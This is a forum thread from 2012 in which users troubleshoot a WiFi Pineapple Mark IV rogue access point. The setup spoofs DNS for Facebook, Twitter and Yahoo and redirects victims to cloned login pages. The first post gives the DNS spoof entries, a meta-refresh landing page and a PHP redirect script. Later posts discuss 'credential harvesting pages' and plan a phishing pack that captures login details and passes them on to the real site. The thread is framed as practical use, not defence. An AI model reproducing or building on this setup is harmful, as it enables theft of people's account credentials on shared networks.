Target Issues With Other Web Browsers

[CanadianTaco]

So I have an Pineapple (mark IV) that is set up to connect through one of my laptops that is set up for internet connection sharing. The idea is that targets can connect to whatever site they want except facebook, twitter, or yahoo. When they attempt to connect to one of these three sites they get redirected to my facebook.html, twitter.html. and Yahoo.htm. On my target laptop (using google chrome and connected to my pineapple network) I can get redirected flawlessly. In Internet Explorer or Firefox, not so much. It gets automatically redirected to the sample 'peets.html' page.

DNS Spoof Host:

172.16.42.1 yahoo.com
172.16.42.1 twitter.com
172.16.42.1 facebook.com

Landing page:

<html>
<head>
<meta http-equiv="REFRESH" content="0;url=/s/redirect.php">
</head>
<body>
</body>
</html>

redirect.php:

<?php
$ref = $_SERVER['HTTP_REFERER'];

if (strpos($ref, "facebook"))	{ header('Location: facebook.html'); }
if (strpos($ref, "twitter"))	{ header('Location: twitter.html'); }
if (strpos($ref, "yahoo"))	{ header('Location: Yahoo.htm'); }

require('peets.html');

?>

tl;dr: Does anyone know why one browser would handle this differently than the other? or if this isn't the issue, how to go about fixing it?

-edit-

If it helps I saved the files using Google Chrome 'save page as' then 'Webpage, Complete'. Although I don't quite see how this could be causing the issue...

Edited March 29, 2012 by CanadianTaco

[PatriceKing]

same here. btw, did you clean up the current login pages... there's a lot of unnecessary code, for the appearance sake, and it doesn't work for me. I did a lot trying to figure out things on the Mk IV, learned tons... if there are some neat and clean login pages that'll be great, otherwise, tomorrow :) thx

[CanadianTaco]

same here. btw, did you clean up the current login pages... there's a lot of unnecessary code, for the appearance sake, and it doesn't work for me. I did a lot trying to figure out things on the Mk IV, learned tons... if there are some neat and clean login pages that'll be great, otherwise, tomorrow :) thx

I left the login pages as they were, except for the login form itself of course.

[bobbyb1980]

This method of phishing was giving me mixed results also. I got better results when I just spoofed the DNS to different addresses and ports running credential harvesting pages. Just out of curiosity which browsers was this not working for?

[Mark4FanGer]

Maybe we should create a "phisiing" pack with all files needed, i am just working on it

some feature-ideas:

will land on the loginpage twice (to be sure to get the right credentials)

will check both inputs of both "trys"

will automaticly put the credentials in the real facebookpage to log the user in

well documented code

...

any ideas are wellcome

regards

mark4fanger

[CanadianTaco]

This method of phishing was giving me mixed results also. I got better results when I just spoofed the DNS to different addresses and ports running credential harvesting pages. Just out of curiosity which browsers was this not working for?

I've only tested it with Google Chrome, Firefox, and Internet Explorer. And so far only Google Chrome works. The other two get automatically redirected to 'peets.html'

-edit-

If it helps I saved the files using Google Chrome 'save page as' then 'Webpage, Complete'. Although I don't quite see how this could be causing the issue...

Edited March 29, 2012 by CanadianTaco

[Technoprenerd]

Hey,

Have this issue too. Even with the Nyan/rickrolling. My case; www.google.com gets displayed normally, and all the other pages with nyan/rickroll.

I think it is in the browser settings orso... :S

(Just might be helpfull)